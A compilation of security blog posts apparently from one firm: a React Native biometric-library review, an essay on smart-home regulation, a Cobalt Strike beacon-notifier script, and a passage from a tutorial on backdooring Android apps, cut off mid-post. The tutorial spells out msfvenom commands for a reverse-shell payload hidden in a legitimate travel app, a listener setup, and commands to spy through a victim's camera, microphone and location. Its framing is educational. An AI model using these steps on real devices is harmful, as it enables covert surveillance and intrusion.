    KeyGenParameterSpec keyGenParameterSpec = new KeyGenParameterSpec.Builder(biometricKeyAlias, KeyProperties.PURPOSE_SIGN)
            .setDigests(KeyProperties.DIGEST_SHA256)
            .setSignaturePaddings(KeyProperties.SIGNATURE_PADDING_RSA_PKCS1)
            .setAlgorithmParameterSpec(new RSAKeyGenParameterSpec(2048, RSAKeyGenParameterSpec.F4))
            .setUserAuthenticationRequired(true)
            .build();
    keyPairGenerator.initialize(keyGenParameterSpec);
    //...
}

We can see in the code snippet above that the AndroidKeystore is used and that the key pair is configured to require user authentication using the setUserAuthenticationRequired method.

We now only need to verify that the success callback properly handles and returns the result of the authentication. Let’s take a look at the onAuthenticationSucceeded method of the CreateSignatureCallback class:

public void onAuthenticationSucceeded(@NonNull BiometricPrompt.AuthenticationResult result) {
    //...
    BiometricPrompt.CryptoObject cryptoObject = result.getCryptoObject();
    Signature cryptoSignature = cryptoObject.getSignature();
    cryptoSignature.update(this.payload.getBytes());
    byte[] signed = cryptoSignature.sign();
    String signedString = Base64.encodeToString(signed, Base64.DEFAULT);
    signedString = signedString.replaceAll("\r", "").replaceAll("\n", "");

    WritableMap resultMap = new WritableNativeMap();
    resultMap.putBoolean("success", true);
    resultMap.putString("signature", signedString);
    promise.resolve(resultMap);
    //... 
}

The success callback uses the authentication result to get the Signature object and to sign the provided payload. The signature is then encoded in base64 and returned in the promise.

The application can therefore provide a payload to the library, which will be signed after the user successfully provided their biometric data. The signature is then returned to the application, which can finally be sent to the server for verification and complete the authentication.

The Android implementation therefore allows for a secure result-based biometric authentication.

iOS

Like for Android, to verify that the library uses a secure implementation, we have to verify that:

  • The private key requires user authentication;
  • The private key is used to perform cryptographic operations;
  • The library returns the result of the above cryptographic operations to the application.

So, let’s dive right in. The following code snippet shows the relevant part of the createSignature method, available in the ReactNativeBiometrics.m file:

RCT_EXPORT_METHOD(createSignature: (NSDictionary *)params resolver:(RCTPromiseResolveBlock)resolve rejecter:(RCTPromiseRejectBlock)reject) {
    //...
    NSData *biometricKeyTag = [self getBiometricKeyTag];
    NSDictionary *query = @{
                            (id)kSecClass: (id)kSecClassKey,
                            (id)kSecAttrApplicationTag: biometricKeyTag,
                            (id)kSecAttrKeyType: (id)kSecAttrKeyTypeRSA,
                            (id)kSecReturnRef: @YES,
                            (id)kSecUseOperationPrompt: promptMessage
                            };
    SecKeyRef privateKey;
    OSStatus status = SecItemCopyMatching((__bridge CFDictionaryRef)query, (CFTypeRef *)&privateKey);

    if (status == errSecSuccess) {
      NSError *error;
      NSData *dataToSign = [payload dataUsingEncoding:NSUTF8StringEncoding];
      NSData *signature = CFBridgingRelease(SecKeyCreateSignature(privateKey, kSecKeyAlgorithmRSASignatureMessagePKCS1v15SHA256, (CFDataRef)dataToSign, (void *)&error));

      if (signature != nil) {
        NSString *signatureString = [signature base64EncodedStringWithOptions:0];
        NSDictionary *result = @{
          @"success": @(YES),
          @"signature": signatureString
        };
        resolve(result);
      }
      //...
    }
}

The library attempts to retrieve the private key, identified by biometricKeyTag, from the Keychain and then uses it to sign a provided payload. When the signing operation succeeds, the library returns the signature to the application. This looks very good already!

Let’s now take a look at how the private key is generated, to ensure that proper user authentication is needed to access it. The key pair is created in the createKeys method, in the same file. The following code snippet shows the relevant part of the method:

RCT_EXPORT_METHOD(createKeys: (RCTPromiseResolveBlock)resolve rejecter:(RCTPromiseRejectBlock)reject) {
    //...
    SecAccessControlRef sacObject = SecAccessControlCreateWithFlags(kCFAllocatorDefault,
                                                                    kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly,
                                                                    kSecAccessControlBiometryAny, &error);
    //...
    NSDictionary *keyAttributes = @{
        (id)kSecClass: (id)kSecClassKey,
        (id)kSecAttrKeyType: (id)kSecAttrKeyTypeRSA,
        (id)kSecAttrKeySizeInBits: @2048,
        (id)kSecPrivateKeyAttrs: @{
        (id)kSecAttrIsPermanent: @YES,
        (id)kSecUseAuthenticationUI: (id)kSecUseAuthenticationUIAllow,
        (id)kSecAttrApplicationTag: biometricKeyTag,
        (id)kSecAttrAccessControl: (__bridge_transfer id)sacObject
        }
    };
    //...
    id privateKey = CFBridgingRelease(SecKeyCreateRandomKey((__bridge CFDictionaryRef)keyAttributes, (void *)&gen_error));
    //...
}

In the above code snippet, we can see that the key pair is generated and added to the Keychain using the kSecAccessControlBiometryAny access control flag. Retrieving the key from the Keychain will therefore require a successful biometric authentication.

The application can therefore provide a payload to the library, which will be signed after the user successfully authenticated. The signature is then returned to the application, which can then be submitted to the server for verification.

The iOS implementation therefore allows for a secure result-based biometric authentication.

As we saw, the react-native-biometrics library provides two biometric authentication methods, one of which, createSignature, offers a secure result-based biometric authentication.

It should be noted that the way the library performs biometric authentication requires the server to implement the signature verification, which is harder and requires more changes on the server side than just decrypting a token on the local device and sending it to the server for verification. However, while it is a bit harder to integrate into an application, it has the advantage of preventing replay attacks, as the authentication payload sent to the server will be different for every authentication.
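To make that more concrete, the following Python sketch shows what such a server-side check could look like. It is not part of the library; the function name, the use of the cryptography package, and the assumption that the app’s public key was stored in PEM form are our own choices, and the signed payload is assumed to be a fresh, server-issued challenge.

import base64

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding


def verify_biometric_signature(public_key_pem: bytes, challenge: str, signature_b64: str) -> bool:
    # The parameters mirror what the library produces: an RSA signature over the
    # payload using SHA-256 and PKCS#1 v1.5 padding (SHA256withRSA on Android,
    # kSecKeyAlgorithmRSASignatureMessagePKCS1v15SHA256 on iOS).
    public_key = serialization.load_pem_public_key(public_key_pem)
    try:
        public_key.verify(
            base64.b64decode(signature_b64),
            challenge.encode("utf-8"),
            padding.PKCS1v15(),
            hashes.SHA256(),
        )
        return True
    except InvalidSignature:
        return False

If the signature verifies against the public key registered during enrollment, the server can consider the user authenticated and invalidate the challenge so it cannot be replayed.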

Result: Secure result-based authentication

Conclusion

Out of the five libraries we analyzed, only one of them, react-native-biometrics, provides a secure result-based biometric authentication which allows for a non-bypassable authentication implementation. The other four libraries only provide event-based biometric authentication, which only allows for a client-side authentication implementation that can therefore be bypassed.

The table below provides a summary of the type of biometric authentication offered by each analyzed library:

Library                            | Event-based | Result-based
react-native-touch-id              | ✓           |
expo-local-authentication          | ✓           |
react-native-fingerprint-scanner   | ✓           |
react-native-fingerprint-android   | ✓           |
react-native-biometrics            | ✓           | ✓

Usage of third-party libraries and mobile development frameworks can certainly decrease the required development effort, and for applications that don’t require a high level of security, there’s not too much that can go wrong. However, if your application does contain sensitive data or functionality, such as applications from the financial, government or healthcare sector, security should be included in each step of the SDLC. In that case, choosing the correct mobile development framework to use (if any) and which external libraries to trust (if any) is a very important step.

About the authors

Simon Lardinois

Simon Lardinois is a Security Consultant in the Software and Security assessment team at NVISO. His main area of focus is mobile application security, but he is also interested in web security and reverse engineering. In addition to mobile application security, he also enjoys developing mobile applications.

Jeroen Beckers

Jeroen Beckers is a mobile security expert working in the NVISO Software and Security assessment team. He is a SANS instructor and SANS lead author of the SEC575 course. Jeroen is also a co-author of OWASP Mobile Security Testing Guide (MSTG) and the OWASP Mobile Application Security Verification Standard (MASVS). He loves to both program and reverse engineer stuff.

Smart Home Devices: assets or liabilities? – Part 3: Looking at the future

29 March 2021 at 12:54

This blog post is the last part of a series, if you are interested in the security or privacy of smart home devices, be sure to check out the other parts as well!

TL;DR: In our previous blog posts we concluded that there is quite a long way to go for both security and privacy of smart home environments. In this one, we will take a look at what the future might bring for these devices.

Introduction

After taking a close look at a series of smart home devices and assessing how well they held up to the expectations of the buyer when it comes to security and privacy, we will propose a few solutions to help the industry move forward and the consumer to make the right decision when buying a new device.

A recap

To freshen up your memory, we’ll quickly go over the key takeaways of our previous blog posts. If you haven’t read them yet, feel free to check out the parts about security and privacy of smart home environments as well!

Security

When it came to security, many of the devices we tested swung one of two ways: either security had played a major role in the manufacturing process and the device performed well across the board, or the manufacturer didn’t give a hoot about security and the device was lacking any kind of security measures altogether. This means that buying one of these devices is a pretty big hit or miss, especially for the less tech-savvy consumer.

To overcome this issue, consumer guidance is needed in some form or another to steer the buyer towards the devices that offer at least a baseline of security measures a consumer could reasonably expect of a device that they will eventually install into their household.

Privacy

Many devices often didn’t perform much better when looking at privacy. Just like with security, there is a massive gap in maturity between manufacturers that put in an effort to be GDPR compliant and those that didn’t. Luckily the industry has undergone a major shift in mentality which means that most companies at least showed a lot more goodwill towards the people whose data they are collecting. Nevertheless, the need for stronger enforcement and more transparency around fines and sanctions became very clear from my results.

How can we regulate?

Regulating the market can be done in many ways, but for this blog post, we’ll be taking a look at two of them that have historically also been used for other products: in the form of binding standards and certifications, or as voluntary quality labels. Each of these has their own advantages and disadvantages.

Standardisation & Certification

The security industry is rife with standards: there is ISO/IEC 27001 to ensure organisations and their services adhere to proper security practices; for secure development, there are standards such as the OWASP SAMM and DSOMM; when it comes to security assessments of specific services or devices, standards such as OWASP’s ASVS and MASVS come to mind. For IoT devices, this is no different: OWASP’s ISVS (IoT Security Verification Standard) offers a standardised, controlled methodology to test the security of IoT devices. And these are just the tip of the iceberg: there are a massive number of resources that can be used, as is reflected in this graph. The fact that so many standards exist reflects the need for specialised industry-specific guidance: a “one-size-fits-all” solution may not exist.

Standards
Did anyone mention standards?
(Image source: XKCD, used under CC BY-NC 2.5)

Mandatory quality requirements and certification to certain standards is nothing new if we take a look at other markets. Take the food industry for example, where rigorous requirements ensure that the meals we put on our table at the end of the day won’t make us sick. But even when we look closer to the smart home devices market, we see that mandatory labels already exist in some form: the CE label is a safety standard that ensures the consumer goods we purchase in the store won’t malfunction and injure us, or the FCC label, that ensures they won’t cause any interference with other radio-controlled devices in the area. Whereas these safety-focused labels and standards are all commonplace and seen as a given, the concept of a binding cyber security baseline for such smart devices is a relatively new one and is not nearly as easily implemented.

The EU’s Cybersecurity Act (CSA) that was introduced in April 2019 gives the European Union Agency for Cybersecurity (ENISA) a new mandate to build out exactly such certification schemes. In response to this, they have published their first certification scheme candidate, the so-called EUCC, in July 2020. Even closer to home, here in Belgium the legal groundwork is also being laid for a Belgian National Cybersecurity Certification Authority, including provisions to accommodate the EU Common Criteria, Cloud Security and 5G certification schemes.

Taking a look overseas, the USA’s “Internet of Things Cybersecurity Improvement Act of 2020” shows us that the need for a stricter regulation of IoT devices not only occurs here in Europe. This newly passed law is based on NIST’s Internal Report 8259 “Foundational Cybersecurity Activities for IoT Device Manufacturers“, and you guessed it – it calls for the creation of IoT security standards and guidelines that the US government will adhere to, in the hope that industry will follow suit.

Quality Labels

On top of the baseline, some consumers may be looking for additional safeguards and guarantees that the device they are buying is up to snuff. Especially when purchasing devices that handle more sensitive types of data, such as smart home assistants, cameras, or locks, security plays a larger role for many buyers. In this case, a voluntary quality label could form a good indicator for consumers that the manufacturer went the extra mile, and it would prove a good point to compete on for the manufacturers themselves to distinguish their product from the competitor’s offerings. Just like the certification of the baseline requirements for devices, an IoT quality label is also proposed in the aforementioned EUCC cybersecurity scheme candidate. Quality labels can be used to either reflect that a device adheres to a certain standard of cyber security or privacy, or that they have implemented additional measures beyond the baseline that are not necessarily found in other devices of the same category. In the case of the EUCC, the label will show a consumer that it is certified against that particular certification scheme, as well as list a CSA assurance level (Basic, Substantial, or High) to reflect the degree of how advanced the security measures of the device are.

Proposed Label by the EUCC
(Image source: EUCC Candidate Scheme, ENISA)

The EUCC is not the first certification scheme that mentions a quality label. In the context of industrial control systems, the IEC 62443-4-1 and 62443-4-2 standards – which formulate guidelines for the production lifecycle and technical guidelines for the security of products – also provide a certification scheme and label, but adoption within the industry has been very slow.

While a widely adopted quality label is not available yet, in the meantime manufacturers can still distinguish themselves by being transparent about the security of their products: how about a page on the website that outlines the efforts spent on security?

Conclusion

To guide the smart home industry towards a better, more solid security baseline and stronger privacy guarantees, binding regulations for all devices sold within the EU can pave the way. These regulations should be based on the mandated use of secure building blocks and easy to verify guidelines. The recent cybersecurity act gives ENISA a new mandate to create exactly such certification schemes, a first of which they have released in July 2020 in the form of the EUCC.

Additionally, a voluntary IoT quality label can be a strong indicator for consumers who want more than just a baseline of security measures and a competition point for manufacturers who want to prove they went the extra mile.

This research was conducted as part of the author’s thesis dissertation submitted to gain his Master of Science: Computer Science Engineering at KU Leuven and device purchases were funded by NVISO labs. The full paper is available on KU Leuven libraries.

Reference

[1] Bellemans Jonah. June 2020. The state of the market: A comparative study of IoT device security implementations. KU Leuven, Faculteit Ingenieurswetenschappen.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their Cyber Security Strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.

Tap tap… is this thing on? Creating a notification-service for Cobalt-Strike

5 March 2021 at 15:07

Ever needed a notifier when a new beacon checks in? Don’t want to keep checking your Cobalt-Strike server every 5 minutes in the hopes of a new callback? We got you covered! Introducing the notification-service aggressor script available at
https://github.com/NVISOsecurity/blogposts/tree/master/cobalt-strike-notifier

If the above image resonates with you, you’ll know that the period between sending out your phish and receiving your first callback is a very stressful time. All kinds of doom scenarios pop into your head… “Did I test my payload sufficiently?”, “Did my email get blocked somewhere along the chain?”, “Did my target pay attention and report it as a phish?” You can solve some of these issues by introducing “canaries” in your payloads, for example an image that phones home when the email is opened, or an arbitrary HTTP (or DNS) request to a server you control.
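As a minimal illustration of such a canary, the Python sketch below serves a tracking-pixel URL and logs every hit. The port and URL path are placeholders, and this is of course separate from the aggressor scripts discussed in the rest of this post.

import logging
from http.server import BaseHTTPRequestHandler, HTTPServer


class CanaryHandler(BaseHTTPRequestHandler):
    """Log every request so you know the moment the phishing e-mail is opened."""

    def do_GET(self):
        # self.path tells you which canary was hit (e.g. /pixel/<campaign-id>.png)
        logging.warning("Canary hit from %s for %s", self.client_address[0], self.path)
        # An <img> tag in the e-mail does not care whether the body is a real image,
        # so an empty 200 response is enough for this sketch.
        self.send_response(200)
        self.end_headers()


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    HTTPServer(("0.0.0.0", 8080), CanaryHandler).serve_forever()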

There is however one thing you cannot control, even if you really wanted to: WHEN a user will click on your payload. If you are using Cobalt-Strike out of the box, this will result in you having to check your GUI every x minutes/hours/days to see if a beacon dialed in or not, and by the time you see your beacon connecting, it might already be several minutes or even hours that your beacon is active, this is of course less than ideal.

Thankfully, Cobalt-Strike allows us to modify or expand its default behavior through the usage of “Aggressor Scripts”. These scripts are developed in “Sleep”, a Java-based scripting language created by Raphael Mudge (the creator of Cobalt-Strike). There are already a ton of aggressor scripts out there, and there even was one that closely resembled our use case, developed by FortyNorthSecurity:
https://fortynorthsecurity.com/blog/aggressor-get-text-messages-for-your-incoming-beacons/

Albeit close to what we wanted to implement, it did not tick all the boxes for us. The aforementioned aggressor relied on older Python code and used an email-to-text service only available in the US. It also didn’t provide an “opt-out”, which means you’d have to kill the aggressor on the team server if you wanted to stop receiving notifications. So we decided to put on our coding hats and started exploring the world of aggressor coding ourselves.

Tackling two problems for the price of one.

Aggressor scripts are profile specific. This means that they get loaded up when you establish your user session and unloaded when you disconnect from the team server.
This is not a problem for normal operations, but for a notification service this might not be what we want. Luckily Raffi (that’s how Raphael Mudge often refers to himself) thought of this and introduced a binary packaged with Cobalt-Strike called “agscript”. This allows you to run Cobalt-Strike in headless mode.

Both approaches have their advantages and disadvantages however:

  • Headless mode requires you to hardcode all your values in your aggressor script or figure out a way to parse them from your GUI event log window.
    This is a bit cumbersome and reduces flexibility in case you want to turn notifications on or off (assuming you don’t want to get signal/text/mail spammed every time you move laterally).
  • “Graphical” mode (for the lack of a better term) will unload if you disconnect from your Cobalt-Strike session. You’ll therefore not receive any notifications if beacons check in while you are disconnected.

We decided we wanted full flexibility so we created both a headless and a graphical aggressor.

Meet our notification GUI

Let’s take a look at our graphical aggressor script first:

As you can see, this is where the power of a graphical aggressor really shines: you can toggle your notifications on and off and fine-tune them however you’d like. Let’s take a look under the hood at how this actually works; I’ll explain as we go. 🙂

First of all, we define global variables; these can then be used from any function we want.
Then we set the debug level to 57; for more information about debug levels, check the Sleep manual.

global ('$emailaddress');
global ('$email2textaddress');
global ('$signalphonenumber');
global ('$receivesignalmessages');
global ('$receivemails');
global ('$receivetexts');
global ('$scriptlocation');

debug(57);

Then we define a callback function. This callback function is called when the set preferences button is clicked and basically takes care of parsing the GUI and setting all global variables to their respective values. This also makes sure they persist when you close and reopen the window. The callback function also takes care of error handling in the GUI, for example if you enable signal messaging but do not provide a signal number.

sub callback {
	$receivemails = $3["emailchkbox"];
	$emailaddress = $3["email"];
	$email2textaddress = $3["txt2email"];
	$receivetexts = $3["textschkbox"];
	$signalphonenumber = $3["signalnumber"];
	$receivesignalmessages = $3["signalchkbox"];
	$scriptlocation = $3["script_location"];
	if(($receivemails eq 'true') && (strlen($emailaddress) == 0))
	{
		show_message("You won't receive emails because you did not input an email address!");
	}	
	else if(($receivetexts eq 'true') && (strlen($email2textaddress) == 0))
	{
		show_message("mail to text field is empty, you will not receive text messages");
	}
	
	else if (($receivesignalmessages eq 'true') && (strlen($signalphonenumber) == 0))
	{
		show_message("You won't receive signal messages because you did not input a phone number");
	}
	
	else
	{
		show_message("preferences saved successfully!");
	}
	
	if (checkError($error)) 
	{
		warn("$error");
	}	

}



The shownotificationdialog function is responsible for drawing our GUI and setting up some default values:

sub shownotificationdialog{
	$dialog = dialog("notification preferences",%(email => $emailaddress, txt2email => $txt2email,signalnumber => $signalphonenumber,script_location => "/home/kali/aggressors/mailer.py", emailchkbox => $receivemails,textschkbox => $receivetexts, signalchkbox => $receivesignalmessages),&callback);
	dialog_description($dialog, "Get notified when a new beacon calls home.");
	drow_text($dialog,"email","Your email address:");
	drow_text($dialog,"txt2email","Email address of the mail-to-text provider:");
	drow_text($dialog,"signalnumber","Your signal phone number in internation notation(+countrycode):");
	drow_text($dialog,"script_location","The location of the mail script on YOUR LOCAL HOST:");
	drow_checkbox($dialog,"emailchkbox","Do you want email notifications?");
	drow_checkbox($dialog,"textschkbox","Do you want text messages?");
	drow_checkbox($dialog,"signalchkbox","Do you want signal messages?");
	dbutton_action($dialog,"set preferences");
	dialog_show($dialog);
}

The popup aggressor hooks onto the Cobalt-Strike menu button in the Cobalt-Strike GUI. A list of hooks can be found here. Basically this function triggers the shownotificationdialog function whenever the button is pressed:

popup aggressor {
item "Notification preferences" {shownotificationdialog();}
}

The real “magic”, however, is in the on beacon_initial callback: this method parses the hostname and the internal IP address from the beacon and invokes the Python script using Sleep’s built-in exec function.

on beacon_initial {
local('$computer');
local('$internal');
$computer = beacon_info($1, "computer");
$internal = beacon_info($1, "internal");
if(($receivemails eq 'true') && (strlen($emailaddress) != 0)){
		 println("executing python $scriptlocation --ip $internal --computer $computer --receive-emails $emailaddress");
		 $handle = exec("python $scriptlocation --ip $internal --computer $computer --receive-emails --email-address $emailaddress");
	}
	
if(($receivetexts eq 'true') && (strlen($email2textaddress) != 0))
{
		println("executing python $scriptlocation --ip $internal --computer $computer --receive-texts --mail_totext $email2textaddress ");
		$handle = exec("python $scriptlocation --ip $internal --computer $computer --receive-texts --mail_totext $email2textaddress");
}
	
if (($receivesignalmessages eq 'true') && (strlen($signalphonenumber) != 0))
{
	println("executing python $scriptlocation --ip $internal --computer $computer --receive-signalmessage --signal-number $signalphonenumber");
	 $handle = exec("python $scriptlocation --ip $internal --computer $computer --receive-signalmessage --signal-number $signalphonenumber");
}
	

if (checkError($error)) 
	{
		warn("$error");
	}	

};

An important gotcha! As I already mentioned, your aggressor script is bound to your profile; it is not bound to the team server. As a result, “exec” will execute the command on YOUR machine, NOT THE TEAM SERVER. The notifier script has some dependencies: the primary one is obviously Python 3, as it’s a Python script. For Signal integration, it relies on signal-cli.


Meet our Notification User!

Our headless-mailer aggressor script shares a lot of similarities with our graphical aggressor script:

global ('$emailaddress');
global ('$email2textaddress');
global ('$signalphonenumber');
global ('$scriptlocation');
global ('$receivemails');
global ('$receivetexts');
global ('$receivesignalmessages');


$emailaddress = "";
$txt2emailaddress ="";
$signalphonenumber ="+countrycode";
$scriptlocation = "/some/dir/notifier.py";
$receivemails = "true";
$receivetexts = "false";
$receivesignalmessages = "true";


on beacon_initial {
local('$computer');
local('$internal');
$computer = beacon_info($1, "computer");
$internal = beacon_info($1, "internal");
if(($receivemails eq 'true') && (strlen($emailaddress) != 0)){
		 say("new beacon detected! Emailing $emailaddress");
		 println("executing python $scriptlocation --ip $internal --computer $computer --receive-emails $emailaddress");
		 $handle = exec("python $scriptlocation --ip $internal --computer $computer --receive-emails --email-address $emailaddress");
	}
	
if(($receivetexts eq 'true') && (strlen($email2textaddress) != 0))
{
		say("new beacon detected! sending an email to the email to text service!");
		println("executing python $scriptlocation --ip $internal --computer $computer --receive-texts --mail_totext $email2textaddress ");
		$handle = exec("python $scriptlocation --ip $internal --computer $computer --receive-texts --mail_totext $email2textaddress");
}
	
if (($receivesignalmessages eq 'true') && (strlen($signalphonenumber) != 0))
{
	say("new beacon detected! sending a signal message to $signalphonenumber");
	println("executing python $scriptlocation --ip $internal --computer $computer --receive-signalmessage --signal-number $signalphonenumber");
	 $handle = exec("python $scriptlocation --ip $internal --computer $computer --receive-signalmessage --signal-number $signalphonenumber");
}
}

As already mentioned, headless means that you’ll need to hardcode your variables instead of setting the options in the GUI. Once you have filled in the variables, you can launch agscript for a headless connection to your Cobalt-Strike server:

./agscript 127.0.0.1 50050 notification-service demo  /home/jean/Documents/Tools/Agressors/headless-notifier.cna     

This can be run from anywhere you want, but your session needs to remain open, so I recommend running it directly on your team server. The syntax is agscript <host> <port> <username> <password> </path/to/cna>. When done successfully, a new user will have entered your server:

Now your notification service is ready for action! When a new beacon spawns, the notification service will announce it in the event log window and take the appropriate action.

Now check your email and/or phone, a new message will be waiting for you!

The real magic lies in the python script!?

Not really though, the python script is fairly trivial:

import argparse
import os
import smtplib
from email.mime.multipart import MIMEMultipart 
from email.mime.text import MIMEText  

#change your smtp login details here.
fromaddr = ""
smtp_password=""
smtp_server =""
smtp_port = 587

#change your signal REGISTRATION number here:
signal_registration_number =""

#leave these blank,will be dynamically filled through the aggressor.
smsaddr = ""
mailaddr = ""


parser = argparse.ArgumentParser(description='beacon info')
parser.add_argument('--computer')
parser.add_argument('--ip')
parser.add_argument('--receive-texts', action="store_true")
parser.add_argument('--receive-emails', action="store_true")
parser.add_argument('--receive-signalmessage', action="store_true")
parser.add_argument('--email-address')
parser.add_argument('--mail_totext')
parser.add_argument('--signal-number')

args = parser.parse_args()
toaddr = []

#take care off email and email2text:
if args.receive_texts and args.mail_totext:
    toaddr.append(smsaddr)
if args.receive_emails and args.email_address:
    toaddr.append(args.email_address)


#message contents:
hostname = args.computer
internal_ip = args.ip
body = "Check your teamserver! \nHostname - " + str(hostname) + "\nInternal IP - " + str(internal_ip)

#email logic
if toaddr:
	print("debug")
	msg = MIMEMultipart()
	msg['From'] = fromaddr
	msg['To'] = ", ".join(toaddr)
	msg['Subject'] = "INCOMING BEACON"
	msg.attach(MIMEText(body, 'plain'))
	server = smtplib.SMTP(smtp_server, smtp_port)
	server.starttls()
	server.login(fromaddr,smtp_password)
	text = msg.as_string()
	server.sendmail(fromaddr, toaddr, text)
	server.quit()

#signal-cli
if args.signal_number and args.receive_signalmessage:
	#take care of signal
	print(f"{args.signal_number}")
	os.system(f"signal-cli -u {signal_registration_number} send -m " + "\"" + str(body) + "\"" +  f" {args.signal_number}")

As you can see it’s nothing more than a simple email script with 1 OS command executor for the signal-cli.

This means that, whether you are executing the graphical or the headless version, you’ll need to have Python 3 installed (and available as your default “python”) and signal-cli installed in your global path as well.

If signal-cli is not in your global path, you can adapt the Python script to take this into account; it only requires a small change, as sketched below. The same goes for python3 not being your default “python” command.
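As an illustration, that change could look something like the following. This is only a sketch: the SIGNAL_CLI_PATH variable, the environment variable name and the helper function are our own examples, not part of the published script.

import os
import subprocess

# Point this at the full path of signal-cli if it is not on your PATH,
# e.g. export SIGNAL_CLI_PATH=/opt/signal-cli/bin/signal-cli
SIGNAL_CLI_PATH = os.environ.get("SIGNAL_CLI_PATH", "signal-cli")


def send_signal_message(registration_number: str, recipient: str, body: str) -> None:
    """Send `body` to `recipient` via signal-cli, wherever it is installed."""
    subprocess.run(
        [SIGNAL_CLI_PATH, "-u", registration_number, "send", "-m", body, recipient],
        check=True,
    )

Using subprocess.run with a list of arguments also avoids the quoting issues you can run into with os.system when the message body contains special characters.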

Conclusions

We hope this “deep” dive into the world of Cobalt-Strike aggressors will open the gates for even more awesome aggressor scripts being developed!
Enjoy your beacon notification services, and good luck, have fun in your next engagements!

The code corresponding to this blog post can be found here:

https://github.com/NVISOsecurity/blogposts/tree/master/cobalt-strike-notifier

About the author

Jean-François Maes is a red teaming and social engineering expert working in the NVISO Cyber Resilience team. 
When he is not working, you can probably find Jean-François in the Gym or conducting research.
Apart from his work with NVISO, he is also the creator of redteamer.tips, a website dedicated to help red teamers.
Jean-François is currently also in the process of becoming a SANS instructor for the SANS SEC699: Purple Team Tactics – Adversary Emulation for Breach Prevention & Detection course.
He was also ranked #1 on the Belgian leaderboard of Hack The Box (a popular penetration testing platform).
You can find Jean-François on LinkedIn , Twitter , GitHub and on Hack The Box.

Backdooring Android Apps for Dummies

31 August 2020 at 07:57

TL;DR – In this post, we’ll explore some mobile malware: how to create them, what they can do, and how to avoid them. Are you interested in learning more about how to protect your phone from shady figures? Then this blog post is for you.

Introduction

We all know the classic ideas about security on the desktop: install an antivirus, don’t click suspicious links, don’t go to shady websites. Those that take it even further might place a sticker over the webcam of their laptop, because that is the responsible thing to do, right?

But why do most people not apply this logic when it comes to their smartphones? If you think about it, a mobile phone is the ideal target for hackers to gain access to. After all, they often come with not one, but two cameras, a microphone, a GPS antenna, speakers, and they contain a boatload of useful information about us, our friends and the messages we send them. Oh, and of course we take our phone with us, everywhere we go.

In other words, gaining remote access to someone’s mobile device enables an attacker to do all kinds of unsavoury things. In this blog post I’ll explore just how easy it can be to generate a rudimentary Android remote administration trojan (or RAT, for short).

  • Do you simply want to know how to avoid these types of attacks? Then I suggest you skip ahead to the section “How to protect yourself” further down the blog post.
  • Do you want to learn the ins and outs of mobile malware making? Then the following section will guide you through the basics, step by step.

It’s important to know that this Metasploit RAT is a very well-known malware strain that is immediately detected by practically any AV solution. This tutorial speaks of a rudimentary RAT because it lacks a lot of the functionality you would find in actual malware in the wild, such as obfuscation to remain undetected, or persistence to retain access to the device even when the app is closed. Because we are simply researching the possibilities of these types of malware and are not looking to attack a real target, this method will do just fine for this tutorial.

Cooking yourself some mobile malware; a recipe

Ingredients

  • A recent Kali VM with the latest Metasploit Framework installed
  • A spare Android device
  • [Optional] A copy of a legitimate Android app (.apk)

Instructions

Step 1 – Find out your IP address

To generate the payload, we will need to find out some more information about our own system. The first piece of information we’ll get is our system’s IP address. For the purpose of this blog post we’ll use our local IP address but in the real world you’d likely use your external IP address in order to allow infected devices to connect back to you.

Our IP address can simply be found by opening a terminal window, and typing the following command:

ip a

The address I will use is the one from the eth0 network adapter, more specifically the local IPv4 address as circled in the screenshot.

Step 2 – Generate the payload

This is where the real work happens: we’ll generate our payload using msfvenom, a payload generator included in the Metasploit Framework.

Before you start, make sure you have the following ready:

  1. Your IP address as found in the previous step
  2. Any unused port to run the exploit handler on
  3. (Optional) A legitimate app to hide the backdoor in

We have two options: either we generate the payload standalone, or we hide it as part of an existing legitimate app. While the former is easier, we will go a step further and use an old version of a well-known travel application to disguise our malware.
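For reference, the standalone variant would look roughly like this (the placeholders are the same ones described below, there are no -x/-k options, and the output is a bare APK rather than a repackaged app):

msfvenom -p android/meterpreter/reverse_tcp LHOST=<your ip address> LPORT=<your unused port> -o standalone.apk

In the rest of this post, however, we’ll continue with the embedded approach.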

To do this, open a new terminal window and navigate to the folder containing the legitimate copy of the app you want to backdoor, then run the following command:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<your_ip_address> LPORT=<your unused port> -x <legitimate app> -k -o <output name>

For this blog post, I used the following values:

  • <your ip address> = 192.168.43.6
  • <your unused port> = 4444
  • <legitimate app> = tripadvisor.apk
  • <output name> = ta-rat.apk

Step 3 – Test the malware

Having our payload is all fine and dandy, but in order to send commands to it, we need to start a listener on our Kali VM on the same port we used to create our malware. To do this, run the following commands:

msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost <your ip address>
set lport <your unused port>

run

Now that we have our listener set up and ready to accept connections, all that remains for us to do is run the malware on our spare Android phone.

For the purposes of this blogpost, I simply transferred the .apk file to the device’s internal storage and ran it. As you can see in the screenshot, the backdoored application requires quite a lot more permissions than the original does.

The original app permissions (left) and the malicious app permissions (right)

All that’s left now is to run the malicious app, and …

We’re in!

Step 4: Playing around with the meterpreter session

Congratulations! If you successfully reached this step, it means you have a working meterpreter session opened on your terminal window and you have pwned the Android phone. So, let’s take a look at what we can do now, shall we?

Activating the cameras

We can get a glimpse into who our victim is by activating either the front or the rear camera of the device. To do this, type the following command in your meterpreter shell:

webcam_stream -i <index>

Where <index> is the index of the camera you want to use. In my experience, the rear camera was index 1, while the selfie camera was at index 2.

Recording the microphone

Curious about what’s being said in the victim’s vicinity? Try recording the microphone by typing:

record_mic -d <duration>

Where <duration> is the duration you want to record in seconds. For example, to record 15 seconds of audio with the device’s built-in microphone, run:

record_mic -d 15

Geolocation

We can also find out our victim’s exact location by typing:

geolocate

This command will give us the GPS coordinates of the device, which we can simply look up in Google Maps.

Playing an audio file

To finish up, we can play any .wav audio file we have on our system, by typing:

play <filename>.wav

For example:

play astley.wav

Experimenting with other functionality

